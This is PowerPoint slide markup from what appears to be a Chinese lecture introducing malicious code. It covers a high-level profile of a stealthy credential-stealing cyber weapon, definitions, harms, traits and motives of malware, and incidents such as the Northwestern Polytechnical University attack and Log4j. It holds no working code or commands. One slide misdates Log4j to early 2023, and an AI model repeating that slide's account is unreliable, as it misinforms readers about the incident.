            <a:ext cx="10417175" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>编码复杂，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高度模块化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>，支持多线程；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>适配操作系统环境广泛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>，包括FreeBSD、Sun Solaris系统以及Debian、RedHat、Centos、Ubuntu等多种Linux发行版，反映出开发者先进的软件工程化能力。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>具有较好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>开放性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>，可以与其他网络武器有效进行集成和联动；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>采用加密和校验等方式加强了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自身安全性和隐蔽性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>灵活的配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>功能，不仅可以提取登录用户名密码等信息，理论上也可以提取所有攻击者想获取的信息，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>功能先进</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>隐蔽性强</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>的强大网络武器工具。</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536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57873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什么是恶意代码（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2665" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>Malicious code</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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="1196340"/>
            <a:ext cx="9853295" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>定义一：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>恶意代码是指在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>未明确提示用户或未经用户许可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>的情况下，在用户计算机或其他终端上安装运行，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>侵犯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>用户合法权益，比如，窃取隐私、破坏主机环境等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>定义二：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>Grimes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>将恶意代码定义为，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>存储介质和网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>进行传播,从一台计算机系统到另外一台计算机系统,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>未经授权认证破坏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>计算机系统完整性的程序或代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>由此定义可得出恶意代码两个显著的特点:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>非授权性和破坏性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="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346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恶意代码危害及特征</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="1196340"/>
            <a:ext cx="9853295" cy="4154170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意代码危害</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>1）攻击系统，造成信息系统瘫痪或操作异常</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>2）危害数据文件的安全存储和使用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>3）泄露文件，配置或隐私信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>4）肆意占用资源，影响系统或网络的性能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意代码的基本特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>1）恶意代码是一类完整程序，也是由人编制的，而不是在计算机环境或系 统中自生的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>2）恶意代码对系统具有破坏性或威胁性，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>非授权性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>3）恶意代码具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>潜伏性（隐蔽性）、传染性、依附性（寄生性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1797685" y="5601970"/>
            <a:ext cx="9458325" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意代码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>体现在，只有你想不到，没有它做不到；你若今天就能想到，明天它就能做到。</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737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为什么产生恶意代码？</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3340735" y="6103302"/>
            <a:ext cx="7444740" cy="534035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>技术本无罪，有罪的是人类无尽的自私和贪婪。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5196840" y="1163320"/>
            <a:ext cx="2058670" cy="64452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b="1"/>
              <a:t>研究</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5196840" y="2301240"/>
            <a:ext cx="2058670" cy="64452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b="1"/>
              <a:t>炫技</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5196840" y="3439160"/>
            <a:ext cx="2058670" cy="102044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b="1" dirty="0"/>
              <a:t>利益</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直接箭头连接符 9"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="4" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6226175" y="1807845"/>
            <a:ext cx="0" cy="493395"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:tailEnd type="arrow" w="med" len="med"/>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a:xfrm>
            <a:off x="6226175" y="2945765"/>
            <a:ext cx="0" cy="493395"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:tailEnd type="arrow" w="med" len="med"/>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8143240" y="1742440"/>
            <a:ext cx="2540000" cy="1696720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469900" marR="0" lvl="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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" kern="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶作剧、炫耀等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" kern="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经济利益</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" kern="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>商业竞争</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" kern="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>政治目的</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="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Char char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" kern="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>军事目的等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5196840" y="4904740"/>
            <a:ext cx="2058670" cy="102044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b="1"/>
              <a:t>政治、军事</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接箭头连接符 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6226175" y="4459605"/>
            <a:ext cx="0" cy="493395"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:tailEnd type="arrow" w="med" len="med"/>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bldLvl="0" animBg="1"/>
      <p:bldP spid="4" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="1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737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恶意代码研究的必要性</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379345" y="878259"/>
            <a:ext cx="7877810" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意代码攻击是信息战、网络战最重要的入侵手段之一。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927656" y="1338634"/>
            <a:ext cx="10098440" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2022</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>月，二十大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>推进国家安全体系和能力现代化，坚决维护国家安全和社会稳定。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2022</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>月报告，西北工业大学被攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>Log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>漏洞：让全球网络面临威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年初，该漏洞允许黑客通过阅读日志文件中的特定字符串来执行恶意代码。这意味着，黑客能够控制受影响的系统，并进行各种恶意操作，如数据窃取、网络攻击等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
